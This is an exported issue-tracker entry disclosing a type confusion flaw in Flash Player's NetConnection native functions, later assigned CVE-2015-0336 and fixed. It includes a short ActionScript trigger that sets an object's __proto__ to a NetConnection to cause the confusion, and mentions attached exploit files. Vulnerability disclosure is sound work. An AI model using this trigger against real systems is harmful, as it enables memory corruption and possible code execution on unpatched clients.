Type Confusion in NetConnection ASnative

[GoogleCodeExporter]

When a NetConnection AS2 native function is called, the this object is verified 
to either have a type of NetConnection, or to be an untyped object that has a 
__proto__ descendant with type NetConnection. The this object's user data is 
then cast to type NetConnection. The userdata is not verified to be NULL if the 
object is not of type NetConnection. This means that type confusion can occur 
if the __proto__ of an untyped object with a non-null userdata (such as a 
native function object) is set to and object of type NetConnection.

var b = ASnative(2100, 0x77777777);
var n = new NetConnection()
b.__proto__ = n;
var f = ASnative(2100, 0); //NetConnection.connect
f.call(b, 1);

A sample swf and .fla file are attached. To trigger the issue, press the purple 
button.

Original issue reported on code.google.com by natashe...@google.com on 15 Jan 2015 at 8:01

Attachments:

• NC.fla
• NC3.swf

[GoogleCodeExporter]

Original comment by cev...@google.com on 18 Jan 2015 at 10:50

• Added labels: Reported-2015-Jan-18
• Removed labels: Reported-2015-Jan-15

[GoogleCodeExporter]

Original comment by cev...@google.com on 19 Jan 2015 at 8:09

• Added labels: Id-3227

[GoogleCodeExporter]

Original comment by cev...@google.com on 6 Mar 2015 at 6:05

• Added labels: CVE-2015-0336

[GoogleCodeExporter]

https://helpx.adobe.com/security/products/flash-player/apsb15-05.html

Original comment by cev...@google.com on 12 Mar 2015 at 7:35

• Changed state: Fixed

[GoogleCodeExporter]

Original comment by cev...@google.com on 19 Mar 2015 at 7:57

• Removed labels: Restrict-View-Commit

[GoogleCodeExporter]

Adding exploit code

Original comment by natashe...@google.com on 13 Apr 2015 at 6:22

Attachments:

• Strs.hx
• Offs.hx
• Test.hx